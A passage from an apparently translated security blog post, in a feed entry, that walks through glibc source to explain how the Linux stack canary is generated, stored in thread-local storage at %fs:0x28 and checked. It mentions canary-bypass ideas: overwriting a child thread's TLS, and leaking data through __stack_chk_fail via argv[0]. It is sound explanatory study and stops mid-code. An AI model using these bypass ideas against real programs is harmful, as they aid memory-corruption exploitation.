  </entry>
  
  <entry>
    <title>A Brief Analysis of the Canary Mechanism in Linux Programs</title>
    <link href="https://kiprey.github.io/2022/08/thread_canary/"/>
    <id>https://kiprey.github.io/2022/08/thread_canary/</id>
    <published>2022-08-24T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.140Z</updated>
    
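    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>I have long been curious about how the canary is implemented on Linux, but never got around to digging into it. That curiosity peaked when I learned that <strong>a canary can be tampered with by modifying a child thread's thread-local storage</strong>, so I decided to study it properly.</p><p>It has been a while since my last blog post, so this is just a brief write-up.</p><span id="more"></span><h2 id="二、什么是-Canary">II. What Is a Canary</h2><p>A canary is a stack protection mechanism that detects, when a function returns, whether the current stack has been corrupted. When a function call pushes a new stack frame, the compiler places a random value at the bottom of that frame and checks it before the function returns and the frame is popped. If the value has changed, a stack overflow has occurred and the program exits:</p><p><img src="/2022/08/thread_canary/image-20220824202737514.png" alt="image-20220824202737514"></p><p>Interestingly, to keep the canary from being leaked by string output functions such as printf, <strong>the lowest byte of the canary is always <code>\x00</code></strong>.</p><p>When canary verification fails, the check inserted by the <strong>compiler</strong> calls the <code>__stack_chk_fail</code> function. For user-space programs, the <code>__stack_chk_fail</code> that gets called is implemented in glibc; it prints a message and terminates the program. Because that message includes the program path taken from <code>argv[0]</code>, an attacker who controls the overflow length can overwrite the <code>argv[0]</code> pointer near the bottom of the stack and use the <code>__stack_chk_fail</code> call to leak information.</p><p>Note that canaries are also used in the Linux kernel: if a stack overflow is detected while kernel code is running, control flow reaches the kernel's own <code>__stack_chk_fail</code>, which calls panic to halt the kernel. Kernel canaries are already well covered by existing articles, so I will not go into them here.</p><h2 id="三、深入-glibc">III. Diving into glibc</h2><p>This post refers to glibc-2.23; the version is fairly old, but the principles are unchanged.</p><p>Let's go through it step by step.</p><h3 id="1-Canary-来源">1. Where the Canary Comes From</h3><p>In the <code>__libc_start_main</code> function in <code>csu/libc-start.c</code>, we can find the statement that assigns the canary:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">  <span class="comment">/* Set up the stack checker&#x27;s canary.  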
*/</span></span><br><span class="line">  <span class="type">uintptr_t</span> stack_chk_guard = _dl_setup_stack_chk_guard (_dl_random);</span><br><span class="line"><span class="meta"># <span class="keyword">ifdef</span> THREAD_SET_STACK_GUARD</span></span><br><span class="line">  <span class="built_in">THREAD_SET_STACK_GUARD</span> (stack_chk_guard);</span><br><span class="line"><span class="meta"># <span class="keyword">else</span></span></span><br><span class="line">  __stack_chk_guard = stack_chk_guard;</span><br><span class="line"><span class="meta"># <span class="keyword">endif</span></span></span><br></pre></td></tr></table></figure><p>Here, <code>_dl_random</code> is a pointer to <strong>random data supplied by the kernel</strong>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Random data provided by the kernel.  */</span></span><br><span class="line"><span class="type">void</span> *_dl_random;</span><br></pre></td></tr></table></figure><p>As for exactly when this kernel random data is set up, all we can say is that it is ready before <strong>the dynamic linker</strong> starts running (a very early point in time); the dynamic linker then picks it up along the following call chain:</p><ol><li><p><strong>elf/rtld.c: the RTLD_START macro</strong>: the main entry point of the dynamic linker.</p></li><li><p><strong>sysdeps/x86_64/dl-machine.h: the architecture-specific asm definition of RTLD_START</strong>: the dynamic linker's entry is written in assembly, so each architecture provides its own version. From the comments and code we can see that the dynamic linker first calls <code>_dl_start</code>, then runs <code>_dl_start_user</code> to do some initialization, and finally jumps to the ELF entry address of the user program:</p> <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span 
class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Initial entry point code for the dynamic linker.</span></span><br><span class="line"><span class="comment">  The C function `_dl_start&#x27; is the real entry point;</span></span><br><span class="line"><span class="comment">  its return value is the user program&#x27;s entry point.  */</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> RTLD_START asm (<span class="string">&quot;\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">.text\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">  .align 16\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">.globl _start\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">.globl _dl_start_user\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">_start:\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">  movq %rsp, %rdi\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">  call _dl_start\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">_dl_start_user:\n\</span></span></span><br><span class="line"><span class="string"><span class="meta"></span></span></span><br><span class="line"><span class="string"><span class="meta">  ...</span></span></span><br><span class="line"><span class="string"><span class="meta"></span></span></span><br><span class="line"><span class="string"><span class="meta">  # And make sure %rsp points to argc stored on the stack.\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">  movq %r13, 
%rsp\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">  # Jump to the user&#x27;s entry point.\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">  jmp *%r12\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">.previous\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">&quot;</span>);</span></span><br></pre></td></tr></table></figure></li><li><p><strong>elf\rtld.c: the _dl_start -&gt; _dl_start_final -&gt; _dl_sysdep_start functions</strong>: <code>_dl_sysdep_start</code> calls several platform-dependent functions for initialization and then calls <code>dl_main</code> to obtain the user program's entry address. What matters to us here, though, is not those operations but this for loop:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">ElfW</span>(Addr)</span><br><span class="line">_dl_sysdep_start (<span class="type">void</span> **start_argptr,</span><br><span class="line">     <span class="built_in">void</span> (*dl_main) (<span class="type">const</span> <span class="built_in">ElfW</span>(Phdr) *phdr, <span class="built_in">ElfW</span>(Word) phnum,</span><br><span class="line">          <span class="built_in">ElfW</span>(Addr) *user_entry, <span class="built_in">ElfW</span>(<span class="type">auxv_t</span>) *auxv))</span><br><span class="line">&#123;</span><br><span class="line">  ...</span><br><span class="line">  <span class="built_in">DL_FIND_ARG_COMPONENTS</span> 
(start_argptr, _dl_argc, _dl_argv, _environ,</span><br><span class="line">         <span class="built_in">GLRO</span>(dl_auxv));</span><br><span class="line">  <span class="keyword">for</span> (av = <span class="built_in">GLRO</span>(dl_auxv); av-&gt;a_type != AT_NULL; <span class="built_in">set_seen</span> (av++))</span><br><span class="line">    ...</span><br><span class="line">   <span class="keyword">case</span> AT_RANDOM:</span><br><span class="line">   _dl_random = (<span class="type">void</span> *) av-&gt;a_un.a_val;</span><br><span class="line">   <span class="keyword">break</span>;</span><br><span class="line">    ...</span><br><span class="line">  ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><code>start_argptr</code> points to the <code>argc</code>, <code>argv</code>, <code>env</code>, and <code>auxv</code> data that the dynamic linker was invoked with, and the <code>DL_FIND_ARG_COMPONENTS</code> macro sorts that data into the corresponding variables <code>_dl_argc</code>, <code>_dl_argv</code>, <code>_environ</code>, and <code>_dl_auxv</code>. In other words, besides the three familiar arguments, the dynamic linker also receives a fourth one, <code>auxv</code>.</p><p>This extra auxiliary vector is an array of data that assists program execution, and it is essential. It carries a lot of useful information; here we only care about <code>AT_RANDOM</code>, the random data from the kernel. This is where its address is assigned to <code>_dl_random</code>, which is later used to generate the canary.</p></li></ol><p>Back in <code>__libc_start_main</code>: once the random data is available, the canary is actually generated as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span 
class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// sysdeps\unix\sysv\linux\dl-osinfo.h</span></span><br><span class="line"><span class="type">static</span> <span class="keyword">inline</span> <span class="type">uintptr_t</span> __attribute__ ((always_inline))</span><br><span class="line">_dl_setup_stack_chk_guard (<span class="type">void</span> *dl_random)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">union</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="type">uintptr_t</span> num;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">char</span> bytes[<span class="built_in">sizeof</span> (<span class="type">uintptr_t</span>)];</span><br><span class="line">  &#125; ret;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* We need in the moment only 8 bytes on 32-bit platforms and 16</span></span><br><span class="line"><span class="comment">     bytes on 64-bit platforms.  Therefore we can use the data</span></span><br><span class="line"><span class="comment">     directly and not use the kernel-provided data to seed a PRNG.  
*/</span></span><br><span class="line">  <span class="built_in">memcpy</span> (ret.bytes, dl_random, <span class="built_in">sizeof</span> (ret));</span><br><span class="line"><span class="meta">#<span class="keyword">if</span> BYTE_ORDER == LITTLE_ENDIAN</span></span><br><span class="line">  ret.num &amp;= ~(<span class="type">uintptr_t</span>) <span class="number">0xff</span>;</span><br><span class="line"><span class="meta">#<span class="keyword">elif</span> BYTE_ORDER == BIG_ENDIAN</span></span><br><span class="line">  ret.num &amp;= ~((<span class="type">uintptr_t</span>) <span class="number">0xff</span> &lt;&lt; (<span class="number">8</span> * (<span class="built_in">sizeof</span> (ret) - <span class="number">1</span>)));</span><br><span class="line"><span class="meta">#<span class="keyword">else</span></span></span><br><span class="line"><span class="meta"># <span class="keyword">error</span> <span class="string">&quot;BYTE_ORDER unknown&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">  <span class="keyword">return</span> ret.num;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>As you can see, the canary is copied straight from the bytes at <code>dl_random</code>, except that its first byte in memory (the low byte on little-endian) is forced to <code>\x00</code> to hinder leaks, which matches what we observed earlier.</p><h3 id="2-Canary-保存">2. Storing the Canary</h3><p>Once again we start from <code>__libc_start_main</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">  <span class="comment">/* Set up the stack checker&#x27;s canary.  
*/</span></span><br><span class="line">  <span class="type">uintptr_t</span> stack_chk_guard = _dl_setup_stack_chk_guard (_dl_random);</span><br><span class="line"><span class="meta"># <span class="keyword">ifdef</span> THREAD_SET_STACK_GUARD</span></span><br><span class="line">  <span class="built_in">THREAD_SET_STACK_GUARD</span> (stack_chk_guard);</span><br><span class="line"><span class="meta"># <span class="keyword">else</span></span></span><br><span class="line">  __stack_chk_guard = stack_chk_guard;</span><br><span class="line"><span class="meta"># <span class="keyword">endif</span></span></span><br></pre></td></tr></table></figure><p>If the <code>THREAD_SET_STACK_GUARD</code> macro is defined, i.e. per-thread stack protection is enabled, the canary is stored in <strong>thread-local storage</strong>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// sysdeps\x86_64\nptl\tls.h</span></span><br><span class="line"><span class="comment">/* Set the stack guard field in TCB head.  
*/</span></span><br><span class="line"><span class="meta"># <span class="keyword">define</span> THREAD_SET_STACK_GUARD(value) \</span></span><br><span class="line"><span class="meta">    THREAD_SETMEM (THREAD_SELF, header.stack_guard, value)</span></span><br></pre></td></tr></table></figure><p>Here, <strong>THREAD_SELF</strong> refers to the current thread's <strong>thread control block</strong>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// sysdeps\x86_64\nptl\tls.h</span></span><br><span class="line"><span class="comment">/* Return the thread descriptor for the current thread.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">   The contained asm must *not* be marked volatile since otherwise</span></span><br><span class="line"><span class="comment">   assignments like</span></span><br><span class="line"><span class="comment">  pthread_descr self = thread_self();</span></span><br><span class="line"><span class="comment">   do not get optimized away.  
*/</span></span><br><span class="line"><span class="meta"># <span class="keyword">define</span> THREAD_SELF \</span></span><br><span class="line"><span class="meta">  (&#123; struct pthread *__self;                  \</span></span><br><span class="line"><span class="meta">     asm (<span class="string">&quot;mov %%fs:%c1,%0&quot;</span> : <span class="string">&quot;=r&quot;</span> (__self)           \</span></span><br><span class="line"><span class="meta">    : <span class="string">&quot;i&quot;</span> (offsetof (struct pthread, header.self)));        \</span></span><br><span class="line"><span class="meta">     __self;&#125;)</span></span><br></pre></td></tr></table></figure><p>The <code>pthread</code> struct is declared as follows; according to the comment, the <code>pthread</code> struct is the <strong>thread control block structure</strong>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Thread descriptor data structure.  
*/</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">pthread</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">union</span></span><br><span class="line">  &#123;</span><br><span class="line"><span class="meta">#<span class="keyword">if</span> !TLS_DTV_AT_TP</span></span><br><span class="line">    <span class="comment">/* This overlaps the TCB as used for TLS without threads (see tls.h).  */</span></span><br><span class="line">    <span class="type">tcbhead_t</span> header;</span><br><span class="line"><span class="meta">#<span class="keyword">else</span></span></span><br><span class="line">    <span class="keyword">struct</span></span><br><span class="line">    &#123;</span><br><span class="line">      ...</span><br><span class="line">    &#125; header;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">    <span class="comment">/* This extra padding has no special purpose, and this structure layout</span></span><br><span class="line"><span class="comment">       is private and subject to change without affecting the official ABI.</span></span><br><span class="line"><span class="comment">       We just have it here in case it might be convenient for some</span></span><br><span class="line"><span class="comment">       implementation-specific instrumentation hack or suchlike.  
*/</span></span><br><span class="line">    <span class="type">void</span> *__padding[<span class="number">24</span>];</span><br><span class="line">  &#125;;</span><br><span class="line"></span><br><span class="line">  ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>On <code>x86_64</code>, the <code>TLS_DTV_AT_TP</code> macro is defined as 0:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// sysdeps\x86_64\nptl\tls.h</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/* The TCB can have any size and the memory following the address the</span></span><br><span class="line"><span class="comment">   thread pointer points to is unspecified.  Allocate the TCB there.  
*/</span></span><br><span class="line"><span class="meta"># <span class="keyword">define</span> TLS_TCB_AT_TP  1</span></span><br><span class="line"><span class="meta"># <span class="keyword">define</span> TLS_DTV_AT_TP  0</span></span><br></pre></td></tr></table></figure><p>Therefore the first field of the <code>pthread</code> struct is <code>tcbhead_t header</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// sysdeps\x86_64\nptl\tls.h</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">void</span> *tcb;    <span class="comment">/* Pointer to the TCB.  Not necessarily the</span></span><br><span class="line"><span class="comment">         thread descriptor used by libpthread.  */</span></span><br><span class="line">  <span class="type">dtv_t</span> *dtv;</span><br><span class="line">  <span class="type">void</span> *self;   <span class="comment">/* Pointer to the thread descriptor.  
*/</span></span><br><span class="line">  <span class="type">int</span> multiple_threads;</span><br><span class="line">  <span class="type">int</span> gscope_flag;</span><br><span class="line">  <span class="type">uintptr_t</span> sysinfo;</span><br><span class="line">  <span class="type">uintptr_t</span> stack_guard;</span><br><span class="line">  <span class="type">uintptr_t</span> pointer_guard;</span><br><span class="line">  </span><br><span class="line">  ... </span><br><span class="line">&#125; <span class="type">tcbhead_t</span>;</span><br></pre></td></tr></table></figure><p>In <code>tcbhead_t</code> we find the familiar <code>stack_guard</code> field; this is where each thread's canary is stored. The <code>tcb</code> and <code>self</code> pointers actually point to the same address, namely the <code>struct pthread</code> (or equivalently the <code>tcbhead_t</code> itself, since the two structures share the same address).</p><p>Looking back at the <code>THREAD_SELF</code> macro, it is easy to infer that the <code>%fs</code> register holds the address of the <code>struct pthread</code>, and that <code>%fs:28h</code> refers to <code>pthread::tcbhead_t::stack_guard</code> (three 8-byte pointers, two 4-byte ints, and the 8-byte <code>sysinfo</code> add up to 0x28), consistent with what IDA showed earlier.</p><blockquote><p>I am not sure why fetching the <code>struct pthread</code> address takes such a detour through the <code>self</code> pointer in its header, though…</p></blockquote><p>It is worth explaining why the <code>%fs</code> register holds the address of the <code>struct pthread</code>. Take a look at this macro:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span 
class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Code to initially initialize the thread pointer.  This might need</span></span><br><span class="line"><span class="comment">   special attention since &#x27;errno&#x27; is not yet available and if the</span></span><br><span class="line"><span class="comment">   operation can cause a failure &#x27;errno&#x27; must not be touched.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">   We have to make the syscall for both uses of the macro since the</span></span><br><span class="line"><span class="comment">   address might be (and probably is) different.  */</span></span><br><span class="line"><span class="meta"># <span class="keyword">define</span> TLS_INIT_TP(thrdescr) \</span></span><br><span class="line"><span class="meta">  (&#123; void *_thrdescr = (thrdescr);                \</span></span><br><span class="line"><span class="meta">     tcbhead_t *_head = _thrdescr;               \</span></span><br><span class="line"><span class="meta">     int _result;                 \</span></span><br><span class="line"><span class="meta">                        \</span></span><br><span class="line"><span class="meta">     _head-&gt;tcb = _thrdescr;                   \</span></span><br><span class="line"><span class="meta">     <span class="comment">/* For now the thread descriptor is at the same address.  */</span>       \</span></span><br><span class="line"><span class="meta">     _head-&gt;self = _thrdescr;                  \</span></span><br><span class="line"><span class="meta">                        \</span></span><br><span class="line"><span class="meta">     <span class="comment">/* It is a simple syscall to set the %fs value for the thread.  
*/</span>       \</span></span><br><span class="line"><span class="meta">     asm volatile (<span class="string">&quot;syscall&quot;</span>                  \</span></span><br><span class="line"><span class="meta">       : <span class="string">&quot;=a&quot;</span> (_result)               \</span></span><br><span class="line"><span class="meta">       : <span class="string">&quot;0&quot;</span> ((unsigned long int) __NR_arch_prctl),           \</span></span><br><span class="line"><span class="meta">         <span class="string">&quot;D&quot;</span> ((unsigned long int) ARCH_SET_FS),         \</span></span><br><span class="line"><span class="meta">         <span class="string">&quot;S&quot;</span> (_thrdescr)                \</span></span><br><span class="line"><span class="meta">       : <span class="string">&quot;memory&quot;</span>, <span class="string">&quot;cc&quot;</span>, <span class="string">&quot;r11&quot;</span>, <span class="string">&quot;cx&quot;</span>);             \</span></span><br><span class="line"><span class="meta">                        \</span></span><br><span class="line"><span class="meta">    _result ? 
<span class="string">&quot;cannot set %fs base address for thread-local storage&quot;</span> : 0;     \</span></span><br><span class="line"><span class="meta">  &#125;)</span></span><br><span class="line"></span><br><span class="line"><span class="meta"># <span class="keyword">define</span> TLS_DEFINE_INIT_TP(tp, pd) void *tp = (pd)</span></span><br></pre></td></tr></table></figure><p>The <code>TLS_INIT_TP</code> macro issues the <code>arch_prctl</code> system call with <code>ARCH_SET_FS</code>, setting the <code>%fs</code> base to the address of the <code>pthread</code> struct passed in. The macro also stores the thread control block's address into the <code>tcb</code> and <code>self</code> pointer fields.</p><p>So when is <code>TLS_INIT_TP</code> invoked to install the main thread's TCB into <code>%fs</code>? There are two cases:</p><ol><li>While <code>dl_main</code> is running, if certain conditions require TLS early, it is initialized ahead of time.</li><li>While <code>__libc_start_main</code> is running, through its <code>__pthread_initialize_minimal -&gt; __libc_setup_tls</code> call chain.</li></ol><p>Either way, this happens before the canary is created; in the second case it happens almost immediately before. The whole flow now fits together:</p><ol><li>Before running <code>dl_main</code>, the dynamic linker initializes <code>_dl_random</code>.</li><li>Before the canary is created, the <code>TLS_INIT_TP</code> macro runs and points <code>%fs</code> at the main thread's thread control block.</li><li>Inside <code>__libc_start_main</code>, the canary is generated from <code>_dl_random</code> and stored in the <strong>canary field of the thread control block</strong> that <code>%fs</code> points to.</li></ol><h3 id="3-Canary-读取">3. 
Reading the Canary</h3><p>We now know how the canary is written into the main thread's TLS, so how is it read back? <code>sysdeps\x86_64\stackguard-macros.h</code> contains this macro definition:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> STACK_CHK_GUARD \</span></span><br><span class="line"><span class="meta">  (&#123; uintptr_t x;           \</span></span><br><span class="line">     <span class="built_in">asm</span> (<span class="string">&quot;mov %%fs:%c1, %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (x)     \</span><br><span class="line">    : <span class="string">&quot;i&quot;</span> (<span class="built_in">offsetof</span> (<span class="type">tcbhead_t</span>, stack_guard))); x; &#125;)</span><br></pre></td></tr></table></figure><p>So the <code>STACK_CHK_GUARD</code> macro is all that is needed to read the current thread's canary, for example:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (stack_chk_guard_copy != STACK_CHK_GUARD)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="built_in">puts</span> (<span class="string">&quot;STACK_CHK_GUARD changed between constructor and do_test&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>If <code>THREAD_SET_STACK_GUARD</code> is not defined, i.e. per-thread stack protection is disabled, the computed canary is kept in the global variable <code>__stack_chk_guard</code> instead:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 
class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// excerpt from __libc_start_main</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Set up the stack checker&#x27;s canary.  */</span></span><br><span class="line">  <span class="type">uintptr_t</span> stack_chk_guard = _dl_setup_stack_chk_guard (_dl_random);</span><br><span class="line"><span class="meta"># <span class="keyword">ifdef</span> THREAD_SET_STACK_GUARD</span></span><br><span class="line">  <span class="built_in">THREAD_SET_STACK_GUARD</span> (stack_chk_guard);</span><br><span class="line"><span class="meta"># <span class="keyword">else</span></span></span><br><span class="line">  <span class="comment">// here!</span></span><br><span class="line">  __stack_chk_guard = stack_chk_guard;</span><br><span class="line"><span class="meta"># <span class="keyword">endif</span></span></span><br></pre></td></tr></table></figure><p>It can still be read through the <code>STACK_CHK_GUARD</code> macro:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// sysdeps\generic\stackguard-macros.h</span></span><br><span class="line">    </span><br><span class="line"><span class="keyword">extern</span> <span class="type">uintptr_t</span> __stack_chk_guard;</span><br><span class="line"><span class="meta">#<span class="keyword">define</span> STACK_CHK_GUARD __stack_chk_guard</span></span><br></pre></td></tr></table></figure><p>The <code>STACK_CHK_GUARD</code> macro has almost no uses inside glibc; my guess is that it exists in preparation for the <strong>canary-reading code</strong> that gcc inserts at compile time.</p><h3 
id="4-TCB-位置">4. TCB Location</h3><h4 id="a-主线程">a. Main Thread</h4><p>The memory allocation for the main thread's TCB is rather involved; there are two paths:</p><ul><li>One is the <code>__libc_start_main -&gt; __pthread_initialize_minimal -&gt; __libc_setup_tls</code> call chain, which calls <code>__sbrk</code> to allocate the TLS on the heap.</li><li>The other is <code>rtld</code>'s <code>_dl_allocate_tls_storage</code> function, which calls <code>mmap</code> to allocate the TLS.</li></ul><p>In practice, though, it looks like most programs have their TCB allocated early in rtld rather than after control reaches the <code>user entry</code>. I wrote a quick test program and debugged it, and the main thread's TLS was indeed created via mmap:</p><p><img src="/2022/08/thread_canary/image-20220825083934721.png" alt="image-20220825083934721"></p><p>gdb does not give the <code>%fs</code> base when the register is read directly; it reports 0:</p><p><img src="/2022/08/thread_canary/image-20220825084033723.png" alt="image-20220825084033723"></p><p>So we have gdb call <code>pthread_self</code> to obtain the current thread's TCB address. The function is quite simple:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">pthread_t</span></span><br><span class="line">__pthread_self (<span class="type">void</span>)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">return</span> (<span class="type">pthread_t</span>) THREAD_SELF;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Here we can see that the canary the user program loads from <code>%fs:28h</code> matches the one stored in the main thread's TCB, confirming the analysis above:</p><p><img src="/2022/08/thread_canary/image-20220825084443810.png" alt="image-20220825084443810"></p><p>Conclusion: the main thread's TLS location is <strong>fairly random</strong>, so changing the main thread's canary by modifying its TLS is nearly impossible.</p><h4 id="b-子线程">b. 
Child Threads</h4><p>To see how the TCB and canary work for child threads, we need to look at the implementation of <code>pthread_create</code>. It lives in <code>nptl\pthread_create.c</code> and comes in two versions, <code>__pthread_create_2_0</code> and <code>__pthread_create_2_1</code>; since 2.0 is a wrapper around 2.1, we focus on the 2.1 implementation.</p><p>Only the interesting fragments are shown here:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">  <span class="keyword">struct</span> <span class="title class_">pthread</span> *pd = <span class="literal">NULL</span>;</span><br><span class="line">  <span class="type">int</span> err = <span class="built_in">ALLOCATE_STACK</span> (iattr, &amp;pd);</span><br><span class="line"></span><br><span class="line">  